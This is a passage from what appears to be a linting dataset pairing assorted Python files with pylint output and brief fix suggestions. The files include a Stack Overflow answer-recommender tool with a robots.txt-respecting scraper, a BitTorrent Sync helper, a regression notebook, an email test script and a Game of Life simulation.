59 log(fg(msg, red), *argv, who=_get_caller())
60 print_advice()
61 close_logs()
62 exit()
63
64
65 def warn(msg, *argv):
66 """Print an error message and aborts execution"""
67 err_off = sys.stderr not in _logs
68 if err_off:
69 add_stderr()
70 log(fg(msg, magenta), *argv, who=_get_caller())
71 _logs.pop()
72
73
74 def print_advice():
75 """Print where to find the full log if necessary"""
76
77 if sys.stderr not in _logs:
78 print(advice_message(), file=sys.stderr)
79
80
81 def log(msg, *argv, **kargs):
82 """Print to logs a formatted message"""
83
84 who = kargs["who"] if "who" in kargs else _get_caller()
85 who = f"[{who}] "
86 textf = who + _strip_ansi(msg.format(*argv))
87 texts = bold(who) + msg.format(*argv)
88 for f in _logs:
89 if f is sys.stderr:
90 print(texts, file=f)
91 sys.stderr.flush()
92 else:
93 print(textf, file=f)
| 14 - warning: anomalous-backslash-in-string
37 - refactor: consider-using-with
37 - warning: unspecified-encoding
62 - refactor: consider-using-sys-exit
|
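
The anomalous-backslash warning disappears with a raw string (the compiled pattern is unchanged, since re understands the octal escape itself), and sys.exit() is the documented replacement for the bare exit(), which is only meant for interactive sessions:

import re
import sys

_ansire = re.compile(r"\033\[[^m]+m")   # same ansi-escape pattern, raw string

# in abort(), instead of exit():
#     sys.exit(1)
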
1 """Spider Tool for Answerable
2
3 This file contains the functions used to wrap requests following
4 respectful practices, taking into account robots.txt, conditional
5 GETs, content caching, etc.
6 """
7
8 import json
9 import requests
10
11 # from random import random as rnd
12 from time import sleep
13 from datetime import timedelta as td
14
15 import feedparser
16 from urllib.robotparser import RobotFileParser
17 from urllib.parse import urlparse
18
19 from tools import cache
20 from tools.displayer import fg, bold, green, yellow, red
21 from tools.log import log, abort
22
23 _rp = {} # robots.txt memory
24
25
26 class _FalseResponse:
27 """Object with the required fields to simulate a HTTP response"""
28
29 def __init__(self, code, content):
30 self.status_code = code
31 self.content = content
32
33
34 def ask_robots(url: str, useragent: str) -> bool:
35 """Check if the useragent is allowed to scrap an url
36
37 Parse the robots.txt file, inferred from the url, and
38 check if the useragent may fetch a specific url.
39 """
40
41 url_struct = urlparse(url)
42 base = url_struct.netloc
43 if base not in _rp:
44 _rp[base] = RobotFileParser()
45 _rp[base].set_url(url_struct.scheme + "://" + base + "/robots.txt")
46 _rp[base].read()
47 return _rp[base].can_fetch(useragent, url)
48
49
50 def get(url, delay=2, use_cache=True, max_delta=td(hours=12)):
51 """Respectful wrapper around requests.get"""
52
53 useragent = "Answerable v0.1"
54
55 # If a cached answer exists and is acceptable, then return the cached one.
56
57 cache_file = url.replace("/", "-")
58 if use_cache:
59 log("Checking cache before petition {}", fg(url, yellow))
60 hit, path = cache.check("spider", cache_file, max_delta)
61 if hit:
62 with open(path, "r") as fh:
63 res = fh.read().replace("\\r\\n", "")
64 return _FalseResponse(200, res)
65
66 # If the robots.txt doesn't allow the scraping, return forbidden status
67 if not ask_robots(url, useragent):
68 log(fg("robots.txt forbids {}", red), url)
69 return _FalseResponse(403, "robots.txt forbids it")
70
71 # Make the request after the specified delay
72 # log("[{}] {}".format(fg("{:4.2f}".format(delay), yellow), url))
73 log("Waiting to ask for {}", fg(url, yellow))
74 log(" in {:4.2f} seconds", delay)
75 sleep(delay)
76 headers = {"User-Agent": useragent}
77 log("Requesting")
78 res = requests.get(url, timeout=10, headers=headers)
79 # Exit the program if the scraping was penalized
80 if res.status_code == 429: # too many requests
81 abort("Too many requests")
82
83 # Cache the response if allowed by user
84 if use_cache:
85 cache.update(
86 "spider", cache_file, res.content.decode(res.encoding), json_format=False
87 )
88
89 return res
90
91
92 def get_feed(url, force_reload=False):
93 """Get RSS feed and optionally remember to reduce bandwith"""
94
95 useragent = "Answerable RSS v0.1"
96 log("Requesting feed {}", fg(url, yellow))
97 cache_file = url.replace("/", "_")
98
99 # Get the conditions for the conditional-GET bandwidth reduction
100 etag = None
101 modified = None
102 if not force_reload:
103 hit, path = cache.check("spider.rss", cache_file, td(days=999))
104 if hit:
105 with open(path, "r") as fh:
106 headers = json.load(fh)
107 etag = headers["etag"]
108 modified = headers["modified"]
109 log("with {}: {}", bold("etag"), fg(etag, yellow))
110 log("with {}: {}", bold("modified"), fg(modified, yellow))
111
112 # Get the feed
113 feed = feedparser.parse(url, agent=useragent, etag=etag, modified=modified)
114
115 # Store the etag and/or modified headers
116 if feed.status != 304:
117 etag = feed.etag if "etag" in feed else None
118 modified = feed.modified if "modified" in feed else None
119 new_headers = {
120 "etag": etag,
121 "modified": modified,
122 }
123 cache.update("spider.rss", cache_file, new_headers)
124 log("Stored new {}: {}", bold("etag"), fg(etag, green))
125 log("Stored new {}: {}", bold("modified"), fg(modified, green))
126
127 return feed
| 26 - refactor: too-few-public-methods
62 - warning: unspecified-encoding
105 - warning: unspecified-encoding
|
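
A usage sketch of the conditional-GET path in get_feed(): the first call stores the etag/modified headers in the cache, so a repeat call lets the server answer 304 Not Modified instead of resending the body. The URL is only an example.

feed = get_feed("https://stackoverflow.com/feeds")
if feed.status == 304:
    print("feed unchanged since the last fetch")
else:
    print(len(feed.entries), "entries fetched")
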
1 """Displayer Tool for Answerable
2
3 This file contains the functions and variables used to present the data.
4 """
5
6 import tools.statistics as st
7
8 #
9 # COLOR RELATED VARIABLES AND FUNCTIONS
10 #
11 red = (250, 0, 0)
12 green = (0, 250, 0)
13 blue = (0, 0, 250)
14
15 cyan = (0, 250, 250)
16 magenta = (250, 0, 250)
17 yellow = (250, 250, 0)
18
19 """
20 white = (250, 250, 250)
21 gray1 = (200, 200, 200)
22 gray2 = (150, 150, 150)
23 gray3 = (100, 100, 100)
24 gray4 = (50, 50, 50)
25 black = (0, 0, 0)
26 """
27
28
29 def lighten(c, r):
30 dr = (250 - c[0]) * r
31 dg = (250 - c[1]) * r
32 db = (250 - c[2]) * r
33 return (int(c[0] + dr), int(c[1] + dg), int(c[2] + db))
34
35
36 def darken(c, r):
37 dr = c[0] * r
38 dg = c[1] * r
39 db = c[2] * r
40 return (int(c[0] - dr), int(c[1] - dg), int(c[2] - db))
41
42
43 """
44 def interpolate(c, d, r):
45 dr = (d[0] - c[0]) * r
46 dg = (d[1] - c[1]) * r
47 db = (d[2] - c[2]) * r
48 return (int(c[0] + dr), int(c[1] + dg), int(c[2] + db))
49 """
50
51 #
52 # ANSI RELATED VARIABLES AND FUNCTIONS
53 #
54 ansi = True
55
56
57 def bold(msg):
58 if not ansi:
59 return msg
60 return "\033[1m{}\033[0m".format(msg)
61
62
63 def fg(msg, color):
64 if not ansi:
65 return msg
66 return "\033[38;2;{:03};{:03};{:03}m{}\033[0m".format(
67 color[0], color[1], color[2], msg
68 )
69
70
71 def bg(msg, color):
72 if not ansi:
73 return msg
74 return "\033[48;2;{:03};{:03};{:03}m{}\033[0m".format(
75 color[0], color[1], color[2], msg
76 )
77
78
79 def color(msg, fgc, bgc):
80 return bg(fg(msg, fgc), bgc)
81
82
83 #
84 # DATA DISPLAY FUNCTIONS
85 #
86 def disp_feed(feed, info, print_info=False):
87 def title(x):
88 return fg(bold(x), lighten(blue, 0.3))
89
90 def tag(x):
91 return fg(f"[{x}]", darken(cyan, 0.2))
92
93 for i in range(len(feed)):
94 entry = feed[i]
95 print("o", title(entry["title"]))
96 print(" ", " ".join(tag(t) for t in entry["tags"]))
97 print(" ", entry["link"])
98 if print_info and info is not None:
99 print(" ", info[i].replace("\n", "\n "))
100
101
102 def table(data, align=""):
103 cols = len(data[0])
104 widths = []
105 for i in range(0, cols):
106 col = [x[i] for x in data]
107 widths.append(max([len(str(c)) for c in col]))
108
109 row_f = " ".join(["{{:{}{}}}".format(align, w) for w in widths])
110 for d in data:
111 print(row_f.format(*d))
112
113
114 def disp_statistics(user_qa):
115
116 ans_f = fg("{}", lighten(blue, 0.3))
117 tag_f = fg("[{}]", darken(cyan, 0.2))
118 val_f = bold(fg("{}", green))
119
120 def print_section(txt):
121 print(bold(txt.upper()))
122 print()
123
124 def print_metric(txt):
125 def mark(x):
126 return bold(x)
127
128 print(mark(txt))
129
130 def print_answer_and_value(answer, value):
131 tags = answer["tags"]
132 print(val_f.format(value), ans_f.format(answer["title"]))
133 print(" " * len(str(value)), " ".join([tag_f.format(t) for t in tags]))
134
135 user_answers = [a for q, a in user_qa]
136
137 print_section("Answer metrics")
138 metrics = [
139 (bold(k), val_f.format(m(user_answers))) for k, m in st.answer_metrics_single
140 ]
141 table(metrics)
142 print()
143 for (name, metric, key) in st.answer_metrics_tops:
144 print_metric(name)
145 results = metric(user_answers)
146 for a in results:
147 print_answer_and_value(a, key(a))
148 print()
149
150 print_section("Tag metrics")
151 for (name, metric) in st.tag_metrics:
152 print_metric(name)
153 results = metric(user_qa)
154 results = [(tag_f.format(r[0]), val_f.format(r[1])) for r in results]
155 table(results)
156 print()
157
158 print_section("Reputation metrics")
159 metrics = [
160 (bold(k), val_f.format(m(user_answers)))
161 for k, m in st.reputation_metrics_single
162 ]
163 table(metrics)
164 print()
165 for w in st.reputation_weight_metrics[0]:
166 results = st.reputation_weight_metrics[1](user_answers, w)
167 for i, info in enumerate(st.reputation_weight_metrics[2]):
168 print_metric(info.format(w * 100))
169 print(val_f.format(results[i]))
| 43 - warning: pointless-string-statement
63 - warning: redefined-outer-name
71 - warning: redefined-outer-name
107 - refactor: consider-using-generator
114 - refactor: too-many-locals
|
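
A quick usage sketch of the ANSI helpers above, run from a module that imports them (requires a terminal with 24-bit color support):

print(bold(fg("recommended", green)))
print(color("inverted warning", red, yellow))      # red text on yellow
print(fg("a 50% lighter blue", lighten(blue, 0.5)))
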
1 """Recommender Tool for Answerable
2
3 This file contains the recommendation algorithm.
4 """
5
6 from bs4 import BeautifulSoup as bs
7 from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
8 from sklearn.metrics.pairwise import linear_kernel
9
10
11 def recommend(user_qa, feed):
12
13 answered = [
14 x[0]["title"] + " " + bs(x[0]["body"], "html.parser").getText(" ", strip=True)
15 for x in user_qa
16 ]
17 tags_ans = [" ".join(x[0]["tags"]) for x in user_qa]
18
19 questions = [x["title"] + x["body"] for x in feed]
20 tags_unans = [" ".join(x["tags"]) for x in feed]
21
22 nans = len(answered)
23 nunans = len(questions)
24
25 """
26 The following code is an adapted version of the Content-Based recommender
27 described in this tutorial:
28
29 https://www.datacamp.com/community/tutorials/recommender-systems-python
30 """
31
32 tfidf = TfidfVectorizer(stop_words="english")
33 count = CountVectorizer(stop_words="english")
34
35 # list of vectorized body and tags
36 tfidf_matrix = tfidf.fit_transform(answered + questions)
37 count_matrix = count.fit_transform(tags_ans + tags_unans)
38
39 # similarity matrices: without and with tags
40 cosine_sim_body = linear_kernel(tfidf_matrix, tfidf_matrix)
41 cosine_sim_tags = linear_kernel(count_matrix, count_matrix) + cosine_sim_body
42
43 # rows: unanswered, cols: answered
44 unans_similarity_body = cosine_sim_body[nans:, :nans]
45 unans_similarity_tags = cosine_sim_tags[nans:, :nans]
46
47 # form of the following lists: [(feed index, value)]
48 sum_sim_body = enumerate([sum(r) for r in unans_similarity_body])
49 max_sim_body = enumerate([max(r) for r in unans_similarity_body])
50 sum_sim_tags = enumerate([sum(r) for r in unans_similarity_tags])
51 max_sim_tags = enumerate([max(r) for r in unans_similarity_tags])
52
53 # sort the indices by the value
54 sort_sum_sim_body = sorted(sum_sim_body, key=lambda x: x[1], reverse=True)
55 sort_max_sim_body = sorted(max_sim_body, key=lambda x: x[1], reverse=True)
56 sort_sum_sim_tags = sorted(sum_sim_tags, key=lambda x: x[1], reverse=True)
57 sort_max_sim_tags = sorted(max_sim_tags, key=lambda x: x[1], reverse=True)
58
59 # map each index to its classifications
60 by_sum_body = {x[0]: i for i, x in enumerate(sort_sum_sim_body)}
61 by_max_body = {x[0]: i for i, x in enumerate(sort_max_sim_body)}
62 by_sum_tags = {x[0]: i for i, x in enumerate(sort_sum_sim_tags)}
63 by_max_tags = {x[0]: i for i, x in enumerate(sort_max_sim_tags)}
64
65 # compute the mean classification for each index
66 mean_index = []
67 for i in range(nunans):
68 mean = (by_sum_body[i] + by_sum_tags[i] + by_max_body[i] + by_max_tags[i]) / 4
69 mean_index.append((mean, i))
70
71 # build the final recommended feed order
72 by_mean = [x[1] for x in sorted(mean_index)]
73
74 return by_mean, None
| 11 - refactor: too-many-locals
25 - warning: pointless-string-statement
|
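
The similarity core above compresses to a few lines: TfidfVectorizer produces L2-normalized rows, so linear_kernel (a plain dot product) yields cosine similarities directly. A self-contained toy run with made-up texts:

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import linear_kernel

answered = ["sorting a python list of tuples", "regex to match digits"]
unanswered = ["how to sort tuples by their second element", "parse html with a regex"]

m = TfidfVectorizer(stop_words="english").fit_transform(answered + unanswered)
sim = linear_kernel(m, m)[len(answered):, :len(answered)]
print(sim)  # sim[i, j]: similarity of unanswered i to answered j
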
1 """Statistics Tool for Answerable
2
3 This file contains the functions used to analyze user answers.
4 """
5
6 #
7 # TAG RELATED METRICS (USING QA)
8 #
9 _tags_info = None
10
11
12 def tags_info(qa):
13 """Map each tag to its score, acceptance and count"""
14
15 global _tags_info
16 if _tags_info is not None:
17 return _tags_info
18 tags_info = {}
19 for _, a in qa:
20 for t in a["tags"]:
21 tc = tags_info.get(t, (0, 0, 0)) # (score, acceptance, count)
22 tc = (tc[0] + a["score"], tc[1] + a["is_accepted"], tc[2] + 1)
23 tags_info[t] = tc
24 _tags_info = tags_info
25 return tags_info
26
27
28 def top_tags_use(qa, top=5):
29 """Top tags by appearance"""
30
31 tags = tags_info(qa)
32 sorted_tags = sorted(tags, key=lambda x: tags[x][2], reverse=True)
33 return [(x, tags[x][2]) for x in sorted_tags][:top]
34
35
36 def top_tags_score_abs(qa, top=5):
37 """Top tags by accumulated score"""
38
39 tags = tags_info(qa)
40 sorted_tags = sorted(tags, key=lambda x: tags[x][0], reverse=True)
41 return [(x, tags[x][0]) for x in sorted_tags][:top]
42
43
44 def top_tags_acceptance_abs(qa, top=5):
45 """Top tags by accumulated acceptance"""
46
47 tags = tags_info(qa)
48 sorted_tags = sorted(
49 tags,
50 key=lambda x: tags[x][1],
51 reverse=True,
52 )
53 return [(x, tags[x][1]) for x in sorted_tags][:top]
54
55
56 def top_tags_score_rel(qa, top=5):
57 """Top tags by score per answer"""
58
59 tags = tags_info(qa)
60 sorted_tags = sorted(tags, key=lambda x: tags[x][0] / tags[x][2], reverse=True)
61 return [(x, tags[x][0] / tags[x][2]) for x in sorted_tags][:top]
62
63
64 def top_tags_acceptance_rel(qa, top=5):
65 """Top tags by acceptance per answer"""
66
67 tags = tags_info(qa)
68 sorted_tags = sorted(tags, key=lambda x: tags[x][1] / tags[x][2], reverse=True)
69 return [(x, tags[x][1] / tags[x][2]) for x in sorted_tags][:top]
70
71
72 #
73 # ANSWER RELATED METRICS
74 #
75 def top_answers(answers, top=5):
76 """Top answers by score"""
77
78 return sorted(answers, key=lambda x: x["score"], reverse=True)[:top]
79
80
81 def top_accepted(answers, top=5):
82 """Top accepted answers by score"""
83
84 return list(
85 filter(
86 lambda x: x["is_accepted"],
87 sorted(answers, key=lambda x: x["score"], reverse=True),
88 )
89 )[:top]
90
91
92 #
93 # REPUTATION RELATED METRICS
94 #
95 def reputation(answer):
96 """Reputation associated to an answers
97 NOT ACCURATE
98 """
99
100 return answer["score"] * 10 + answer["is_accepted"] * 15
101
102
103 _answers_sorted_reputation = None
104 _total_reputation = None
105
106
107 def answers_sorted_reputation(answers):
108 """Answers sorted by associated reputation"""
109
110 global _answers_sorted_reputation
111 if _answers_sorted_reputation is None:
112 _answers_sorted_reputation = sorted(
113 answers, key=lambda x: reputation(x), reverse=True
114 )
115 return _answers_sorted_reputation
116
117
118 def total_reputation(answers):
119 """Total reputation gained from answers"""
120
121 global _total_reputation
122 if _total_reputation is None:
123 _total_reputation = sum([reputation(a) for a in answers])
124 return _total_reputation
125
126
127 def average_reputation_weight(answers, w):
128 """Average reputation and weight of answers generating w % reputation"""
129
130 repw = total_reputation(answers) * w
131 sorted_answers = answers_sorted_reputation(answers)
132 acc_rep = 0
133 acc_ans = 0
134 while acc_rep < repw and acc_ans < len(sorted_answers):
135 acc_rep += reputation(sorted_answers[acc_ans])
136 acc_ans += 1
137 if acc_ans == 0:
138 return (0, 0)
139 return (acc_rep / acc_ans, 100 * acc_ans / len(answers))
140
141
142 #
143 # LISTS TO SIMPLIFY CALLING
144 #
145 tag_metrics = [ # call with qa
146 ("Top used tags", top_tags_use),
147 ("Top tags by accumulated score", top_tags_score_abs),
148 ("Top tags by score per answer", top_tags_score_rel),
149 ("Top tags by accumulated acceptance", top_tags_acceptance_abs),
150 ("Top tags by acceptance per answer", top_tags_acceptance_rel),
151 ]
152 answer_metrics_single = [ # call with answers
153 ("Answers analyzed", len),
154 ("Total score", lambda x: sum([a["score"] for a in x])),
155 ("Average score", lambda x: sum([a["score"] for a in x]) / len(x)),
156 ("Total accepted", lambda x: sum([a["is_accepted"] for a in x])),
157 ("Acceptance ratio", lambda x: sum([a["is_accepted"] for a in x]) / len(x)),
158 ]
159 answer_metrics_tops = [ # call with answers
160 ("Top answers by score", top_answers, lambda a: a["score"]),
161 ("Top accepted answers by score", top_accepted, lambda a: a["score"]),
162 ]
163 reputation_metrics_single = [ # call with answers
164 ("Total reputation", lambda x: sum([reputation(a) for a in x])),
165 ("Average reputation", lambda x: sum([reputation(a) for a in x]) / len(x)),
166 ]
167 reputation_weight_metrics = ( # call with answers and weights
168 [0.95, 0.80],
169 average_reputation_weight,
170 (
171 "Average reputation on answers generating {:.0f}% reputation",
172 "Percentage of answers generating {:.0f}% reputation",
173 ),
174 )
| 18 - warning: redefined-outer-name
15 - warning: global-statement
110 - warning: global-statement
113 - warning: unnecessary-lambda
121 - warning: global-statement
123 - refactor: consider-using-generator
154 - refactor: consider-using-generator
155 - refactor: consider-using-generator
156 - refactor: consider-using-generator
157 - refactor: consider-using-generator
164 - refactor: consider-using-generator
165 - refactor: consider-using-generator
|
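
A worked example of the reputation() approximation above: an accepted answer with score 4 yields 4 * 10 + 1 * 15 = 55 (is_accepted is a boolean, and True counts as 1):

answer = {"score": 4, "is_accepted": True}
assert reputation(answer) == 4 * 10 + 1 * 15 == 55
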
1 """Recommender Tool for Answerable
2
3 This file contains the recommendation algorithm.
4 """
5 import tools.displayer
6
7 from bs4 import BeautifulSoup as bs
8 from sklearn.feature_extraction.text import TfidfVectorizer
9 from sklearn.metrics.pairwise import linear_kernel
10 import numpy as np
11 import re
12
13
14 def preprocessed_text_from_html(html):
15 soup = bs(html, "html.parser")
16 for tag in soup.findAll(name="code"):
17 tag.decompose()
18 text = soup.getText(" ", strip=True)
19 text = re.sub(r"\d+", "", text)
20 text = " ".join(re.findall(r"[\w+_]+", text))
21 return text.lower()
22
23
24 def recommend(user_qa, feed):
25
26 answered = [
27 " ".join(x["tags"])
28 + " "
29 + x["title"].lower()
30 + " "
31 + preprocessed_text_from_html(x["body"])
32 for [x, _] in user_qa
33 ]
34
35 unanswered = [
36 " ".join(x["tags"])
37 + " "
38 + x["title"].lower()
39 + " "
40 + preprocessed_text_from_html(x["body"])
41 for x in feed
42 ]
43
44 nans = len(answered)
45
46 tfidf = TfidfVectorizer(stop_words="english")
47
48 # list of vectorized text
49 tfidf_matrix = tfidf.fit_transform(answered + unanswered)
50
51 # similarity matrix of each answer with the rest
52 cosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)
53
54 # rows: unanswered, cols: answered
55 unans_similarity = cosine_sim[nans:, :nans]
56
57 # index: unanswered. values: max similarity, text size and score
58 max_sim = list(enumerate([max(r) for r in unans_similarity]))
59 unans_sizes = [len(u.split()) for u in unanswered]
60 score = [x * x * unans_sizes[i] for i, x in max_sim]
61
62 # sort the indices by the value
63 by_score = sorted(list(enumerate(score)), key=lambda x: x[1], reverse=True)
64
65 # relation between index in feed and index of closest answered
66 closest = [
67 (i, np.where(np.isclose(unans_similarity[i], v))[0][0]) for i, v in max_sim
68 ]
69
70 # store displayable information
71 b = tools.displayer.bold
72 info_f = "{}: {{}}\n{}:{{}} {}: {{}} {}: {{}}".format(
73 b("Closest"),
74 b("Text size"),
75 b("Similarity"),
76 b("Score"),
77 )
78 info = []
79 for unans, ans in closest:
80 info.append(
81 info_f.format(
82 user_qa[ans][0]["title"],
83 unans_sizes[unans],
84 f"{100*max_sim[unans][1]:.2f}%",
85 f"{score[unans]:.2f}",
86 )
87 )
88
89 # get the indexes, now sorted
90 sorted_index = [x[0] for x in by_score]
91
92 return sorted_index, info
| 24 - refactor: too-many-locals
|
1 import time
2 import threading
3 import os
4 import pwd
5 import grp
6 from client import Client
7
8 class BtsyncHelper:
9
10 global client
11 client = Client(host='127.0.0.1', port='8888', username='admin', password='******')
12
13 def get_folders(self):
14 return client.sync_folders
15
16 def check_folder(self, folder_path):
17 for f in self.get_folders():
18 if f['name'] == folder_path:
19 return True
20 return False
21
22 def create_folder(self, path):
23 secret = client.generate_secret()
24 return self.add_folder(path, secret['secret'])
25
26 def add_folder(self, path, secret):
27 if not os.path.exists(path):
28 os.makedirs(path)
29
30 if self.check_folder(path) == True:
31 return 'Folder: ' + str(path) + ' already synchronized'
32
33 uid = pwd.getpwnam('root').pw_uid
34 os.chown(path, uid, -1)
35
36 print 'Trying to open directory: ' + path
37 client.add_sync_folder(path, secret)
38
39 file = open(path + '/readme', 'a')
40 file.write('This file automatically created for testing synchronization by BitTorrent Sync')
41 file.close()
42 os.chown(path + '/readme', uid, -1)
43
44 return str(path) + " created! Secret: " + secret
| 36 - error: syntax-error
|
1 import pandas as pd
2 import numpy as np
3 import matplotlib.pyplot as plt
4 import seaborn as sns
5 from IPython.display import display
6 from sklearn.model_selection import train_test_split
7 from sklearn.linear_model import LinearRegression
8 from sklearn import metrics
9
10 customers = pd.read_csv('StudentsPerformance.csv')
11
12 display(customers.head())
13 customers.head()
14 customers.info()
15 display(customers.describe())
16
17 sns.jointplot('reading score', 'writing score', data=customers)
18 sns.pairplot(customers)
19 sns.lmplot('reading score', 'writing score', data=customers)
20
21 X = customers[['writing score', 'reading score', 'math score']]
22 y = customers[['math score']]
23
24 X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=101)
25
26 lm = LinearRegression()
27
28 lm.fit(X_train, y_train)
29
30 print(lm.coef_)
31
32 predictions = lm.predict(X_test)
33
34 plt.scatter(y_test, predictions)
35 plt.xlabel('Y Test')
36 plt.ylabel('Predicted Y')
37
38 mae = metrics.mean_absolute_error(y_test, predictions)
39 mse = metrics.mean_squared_error(y_test, predictions)
40 rmse = np.sqrt(metrics.mean_squared_error(y_test, predictions))
41
42 print(mae, mse, rmse)
43
44 coeffs = pd.DataFrame(data=lm.coef_.transpose(), index=X.columns, columns=['Coefficient'])
45 coeffs.plot()
46 display(coeffs)
47 plt.show() | Clean Code: No Issues Detected
|
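
pylint reports this script clean, but two things are worth flagging. First, recent seaborn releases reject the positional x/y form used in jointplot and lmplot; the keyword form works on old and new versions alike. Second, 'math score' sits in both X and y, so the regression predicts its own target and the near-zero errors are an artifact. A hedged sketch of both fixes:

sns.jointplot(x='reading score', y='writing score', data=customers)
sns.lmplot(x='reading score', y='writing score', data=customers)

X = customers[['writing score', 'reading score']]   # drop the target column
y = customers['math score']
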
1 import smtplib
2 import getpass
3
4 FROM = 'zning'
5 TO = 'airportico@gmail.com'
6 SUBJECT = 'test'
7 TEXT = 'testtttt'
8
9 message = """ from: %s\nto: %s\nsubject: %s\n\n%s""" % (FROM, ", ".join(TO), SUBJECT, TEXT)
10
11 try:
12 server = smtplib.SMTP('smtp.gmail.com', 587)
13 server.ehlo()
14 server.starttls()
15 user = input("User name: ")
16 pwd = getpass.getpass('Password: ')
17 server.login(user, pwd)
18 server.sendmail(FROM, TO, message)
19 server.close()
20 print("email sent...")
21 except:
22 print("failed...") | 21 - warning: bare-except
|
1 import os
2 from shutil import copyfile
3
4 if os.path.exists(''):
5 os.remove('')
6
7 copyfile('', ) | 7 - error: no-value-for-parameter
|
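
The stub above passes an empty path and omits copyfile's required dst argument, hence the no-value-for-parameter error. A complete call looks like this (both paths are placeholders):

import os
from shutil import copyfile

src, dst = "settings.ini", "settings.ini.bak"   # hypothetical paths
if os.path.exists(dst):
    os.remove(dst)
copyfile(src, dst)
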
1 import sys, argparse
2 import numpy as np
3 import matplotlib.pyplot as plot
4 import matplotlib.animation as animation
5
6 from helper import *
7 from displayTextSpawner import displayText
8 from inputValidator import validateInput
9
10 paused = True
11 iteration = 0
12
13 def update(frameNumber, image, grid, gridSize):
14 newGrid = grid.copy()
15 global paused
16 global iteration
17
18 if paused is True and iteration > 0:
19 value = raw_input('Press any [Key] to start simulation:')
20 image.set_data(newGrid)
21 grid[:] = newGrid[:]
22 paused = False
23 else:
24 for index in range(gridSize):
25 for subIndex in range(gridSize):
26 total = int((grid[index, (subIndex-1)%gridSize] + grid[index, (subIndex+1)%gridSize] +
27 grid[(index-1)%gridSize, subIndex] + grid[(index+1)%gridSize, subIndex] +
28 grid[(index-1)%gridSize, (subIndex-1)%gridSize] + grid[(index-1)%gridSize, (subIndex+1)%gridSize] +
29 grid[(index+1)%gridSize, (subIndex-1)%gridSize] + grid[(index+1)%gridSize, (subIndex+1)%gridSize])/ON)
30 if iteration > 0:
31 if grid[index, subIndex] == ON:
32 if (total < 2) or (total > 3):
33 newGrid[index, subIndex] = OFF
34 else:
35 if total == 3:
36 newGrid[index, subIndex] = ON
37 image.set_data(newGrid)
38 grid[:] = newGrid[:]
39 iteration += 1
40
41 return image
42
43 def main():
44 parser = argparse.ArgumentParser(description="Runs Conway's Game of Life simulation.")
45 parser.add_argument('--grid-size', dest='gridSize', required=False)
46 parser.add_argument('--mov-file', dest='movfile', required=False)
47 parser.add_argument('--interval', dest='interval', required=False)
48 parser.add_argument('--glider', dest='glider', required=False)
49 parser.add_argument('--gosper', dest='gosper', required=False)
50 parser.add_argument('--display', dest='displayText', required=False)
51 args = parser.parse_args()
52
53 gridSize = 100
54 if args.gridSize and int(args.gridSize) > 8:
55 gridSize = int(args.gridSize)
56
57 updateInterval = 50
58 if args.interval:
59 updateInterval = int(args.interval)
60
61 grid = np.array([])
62
63 if args.glider:
64 grid = np.zeros(gridSize*gridSize).reshape(gridSize, gridSize)
65 addGlider(1, 1, grid)
66 elif args.gosper:
67 grid = np.zeros(gridSize*gridSize).reshape(gridSize, gridSize)
68 addGosperGliderGun(10, 10, grid)
69 elif args.displayText and validateInput(args.displayText):
70 if args.displayText == 'alphanumspec':
71 grid = displayText('abcdefghijklmnopqrstuvwxyz_0123456789_', gridSize)
72 elif args.displayText == 'david':
73 grid = displayText('happy_birthday___david!!!!', gridSize)
74 else:
75 grid = displayText(args.displayText, gridSize)
76 else:
77 grid = randomGrid(gridSize)
78
79 fig, ax = plot.subplots()
80 img = ax.imshow(grid, interpolation='nearest')
81
82 plot.title("PyLife V1.0")
83
84 ani = animation.FuncAnimation(fig, update, fargs=(img, grid, gridSize),
85 frames = 10,
86 interval=updateInterval,
87 save_count=50)
88
89 if args.movfile:
90 ani.save(args.movfile, fps=30, extra_args=['-vcodec', 'libx264'])
91
92 plot.show()
93
94 if __name__ == '__main__':
95 main()
| 4 - refactor: consider-using-from-import
6 - warning: wildcard-import
15 - warning: global-statement
16 - warning: global-statement
19 - error: undefined-variable
29 - error: undefined-variable
31 - error: undefined-variable
33 - error: undefined-variable
36 - error: undefined-variable
18 - refactor: too-many-nested-blocks
13 - warning: unused-argument
19 - warning: unused-variable
65 - error: undefined-variable
68 - error: undefined-variable
77 - error: undefined-variable
1 - warning: unused-import
|
1 from alphaNumLib import *
2
3 alphaNumArray = alphaArray + numArray + specialArray
4
5 def validateInput(input):
6 if(checkInAlphaNumSpec(input)):
7 return True
8 else:
9 return False
10
11 def checkInAlphaNumSpec(input):
12 inputCharArray = list(input.lower())
13 for value in inputCharArray:
14 if value not in alphaNumArray:
15 return False
16 return True
| 1 - warning: wildcard-import
3 - error: undefined-variable
3 - error: undefined-variable
3 - error: undefined-variable
5 - warning: redefined-builtin
6 - refactor: simplifiable-if-statement
6 - refactor: no-else-return
11 - warning: redefined-builtin
|
1 import numpy as np
2 import matplotlib.pyplot as plot
3 import matplotlib.animation as animation
4
5 ON = 255
6 OFF = 0
7 vals = [ON, OFF]
8
9 def randomGrid(gridSize):
10 return np.random.choice(vals, gridSize*gridSize, p=[0.2, 0.8]).reshape(gridSize, gridSize)
11
12 def addGlider(row, col, grid):
13 glider = np.array([[OFF, OFF, ON],
14 [ON, OFF, ON],
15 [OFF, OFF, OFF]])
16 grid[row:row+3, col:col+3] = glider
17
18 def addGosperGliderGun(row, col, grid):
19 gun = np.zeros(11*38).reshape(11, 38)
20
21 gun[5][1] = gun[5][2] = ON
22 gun[6][1] = gun[6][2] = ON
23
24 gun[3][13] = gun[3][14] = ON
25 gun[4][12] = gun[4][16] = ON
26 gun[5][11] = gun[5][17] = ON
27 gun[6][11] = gun[6][15] = gun[6][17] = gun[6][18] = ON
28 gun[7][11] = gun[7][17] = ON
29 gun[8][12] = gun[8][16] = ON
30 gun[9][13] = gun[9][14] = ON
31
32 gun[1][25] = ON
33 gun[2][23] = gun[2][25] = ON
34 gun[3][21] = gun[3][22] = ON
35 gun[4][21] = gun[4][22] = ON
36 gun[5][21] = gun[5][22] = ON
37 gun[6][23] = gun[6][25] = ON
38 gun[7][25] = ON
39
40 gun[3][35] = gun[3][36] = ON
41 gun[4][35] = gun[4][36] = ON
42
43 grid[row:row+11, col:col+38] = gun
| 3 - refactor: consider-using-from-import
2 - warning: unused-import
3 - warning: unused-import
|
1 from flask_marshmallow import Marshmallow
2 from app import app
3 from app.models import User, Post, Comment
4
5 ma = Marshmallow(app)
6
7
8 class CommentSchema(ma.Schema):
9 class Meta:
